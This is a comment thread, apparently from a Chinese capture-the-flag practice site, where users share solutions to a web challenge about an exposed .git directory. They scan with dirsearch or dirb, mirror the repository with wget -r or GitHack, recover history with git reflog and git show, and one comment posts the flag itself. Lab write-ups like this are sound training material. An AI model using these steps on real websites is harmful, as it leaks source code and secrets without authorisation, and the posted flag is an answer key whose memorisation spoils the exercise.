dirsearch -u “URL” wget -r url/.git git reflog | awk '{print $1}' | xargs -I a git show a | grep -o "flag{.*}"
1.kali环境集成,用dirb,url,直接获取路径; 2.然后wget -r http://url/.git 下载到本地; 3.然后cd到这个文件路径,用命令git reflog查看更改历史,ID; 4.再一个个git show ID,就能找到flag
首先dirsearch扫描然后找到/.git ,在使用wget -r 地址 下载文件,cd到这个文件夹,用git reflog 回溯,再用git show
dirb 递归目录 wget -r 递归下载 git reflog 查看分支数量 git show 查看每一个分支的内容 找到flag
flag{git_is_good_distributed_version_control_system}
扫描发现有git泄露利用githack 然后git reflog 在用git show 查看
在url后面加上/.git/然后用GitHack
git_extract python2 git_extract.py http://example.com/.git/ 就可以下载啦 第二个文件打开就是flag个了
闹麻了
kali中的dirsearch和GitHack需要去下载安装才可以去作
...
评论
kumu7y 16天前
举报
dirsearch -u “URL” wget -r url/.git git reflog | awk '{print $1}' | xargs -I a git show a | grep -o "flag{.*}"
cuoluoche163com 1月前
举报
1.kali环境集成,用dirb,url,直接获取路径; 2.然后wget -r http://url/.git 下载到本地; 3.然后cd到这个文件路径,用命令git reflog查看更改历史,ID; 4.再一个个git show ID,就能找到flag
123erwqh 1月前
举报
首先dirsearch扫描然后找到/.git ,在使用wget -r 地址 下载文件,cd到这个文件夹,用git reflog 回溯,再用git show
kingx3 1月前
举报
dirb 递归目录 wget -r 递归下载 git reflog 查看分支数量 git show 查看每一个分支的内容 找到flag
anheqiao 1月前
举报
flag{git_is_good_distributed_version_control_system}
Zhumeng 1月前
举报
扫描发现有git泄露利用githack 然后git reflog 在用git show 查看
Poisonwolf 2月前
举报
在url后面加上/.git/然后用GitHack
15195388189 2月前
举报
git_extract python2 git_extract.py http://example.com/.git/ 就可以下载啦 第二个文件打开就是flag个了
root007 2月前
举报
闹麻了
2141373267 2月前
举报
kali中的dirsearch和GitHack需要去下载安装才可以去作